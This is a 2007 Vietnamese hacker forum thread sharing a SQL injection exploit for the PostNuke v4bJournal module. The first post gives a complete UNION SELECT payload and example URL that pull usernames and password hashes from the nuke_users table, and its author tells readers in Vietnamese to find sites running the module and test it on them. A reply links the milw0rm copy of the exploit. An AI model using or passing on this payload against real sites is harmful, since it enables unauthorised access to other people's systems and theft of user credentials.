| [Announcement] Post Nuke v4bJournal Module Sql Inject (02-05-07) |
04/05/2007 00:13:06 (+0700) | #1 | 56950 |
![[Avatar]](/hvaonline/images/avatar/a98ba70a6aaa1d3da549927a4ca79dfa.jpg "[Avatar]")
|
SonNguyen_sn
Member
![[Minus]](/hvaonline/templates/viet/images/minus.gif "[Minus]") |
0 |
![[Plus]](/hvaonline/templates/viet/images/plus.gif "[Plus]")
|
|
Joined: 16/04/2007 20:10:44
Messages: 53
Offline
|
|
Vừa check được chú này. Mọi người kiếm cái site nào sử dụng Source này. Test thử cái xem thế nào.
PostNuke Journal
----------------------------------------
DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran
Greetz For All Y! UnderGround Group Members ( www.2600.ir )
Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )
Contact: abbasi (at) ustmb.ac (dot) ir [email concealed]
{SQL BUG}
in
index.php?module=v4bJournal&func=journal_comment&id=(SQL)------------------------------------------
EXPLIOT BY :ABDUCTER
Greetz For ABDUCTER Real Friend Nanos (Nancy)
index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/selec
t/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/n
uke_users/**/where/**/pn_uid=2/*EX:-
http://www.example.com/index.php?mod...urnal_comment&
id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,1
1,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*
U must regrister first ( You Most Have An Account On Vulnerable Site ) |
|
|
 |
|
| [Question] Post Nuke v4bJournal Module Sql Inject (02-05-07) |
04/05/2007 00:26:58 (+0700) | #2 | 56952 |
![[Avatar]](/hvaonline/images/avatar/37f81f42a8ac7d8b85836a22d542d287.jpg "[Avatar]")
|
minhquan1712
Member
|
|
0 |
|
|
Joined: 07/09/2006 16:17:25
Messages: 240
Offline
|
|
Vừa check được chú này
cái này bên milw0rm có share rồi mà
try it now ^_^
ax. cha này pót lên mà còn bỏ đi cái example của người ta nữa chứ 
các bạn xem trang này thì sẽ rõ Code:
http://milw0rm.com/exploits/3835
|
|
|
| [Question] Post Nuke v4bJournal Module Sql Inject (02-05-07) |
04/05/2007 00:59:14 (+0700) | #3 | 56961 |
|
SonNguyen_sn
Member
|
|
0 |
|
|
Joined: 16/04/2007 20:10:44
Messages: 53
Offline
|
|
| Users currently in here |
|
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
Thông tin new bugs và exploits
![[Profile]](/hvaonline/templates/viet/images/en_US/icon_profile.gif "[Profile]"){kind=icon}
![[PM]](/hvaonline/templates/viet/images/en_US/icon_pm.gif "[PM]"){kind=icon}
![[Up]](/hvaonline/templates/viet/images/en_US/icon_up.gif "[Up]"){kind=icon}
![[Print Copy]](/hvaonline/templates/viet/images/en_US/icon_print.gif "[Print Copy]"){kind=icon}
)
![[digg]](/hvaonline/templates/viet/images/digg.gif "[digg]")
![[delicious]](/hvaonline/templates/viet/images/delicious.gif "[delicious]")
![[google]](/hvaonline/templates/viet/images/google.gif "[google]")
![[yahoo]](/hvaonline/templates/viet/images/yahoo.gif "[yahoo]")
![[technorati]](/hvaonline/templates/viet/images/technorati.gif "[technorati]")
![[reddit]](/hvaonline/templates/viet/images/reddit.gif "[reddit]")
![[stumbleupon]](/hvaonline/templates/viet/images/stumbleupon.gif "[stumbleupon]")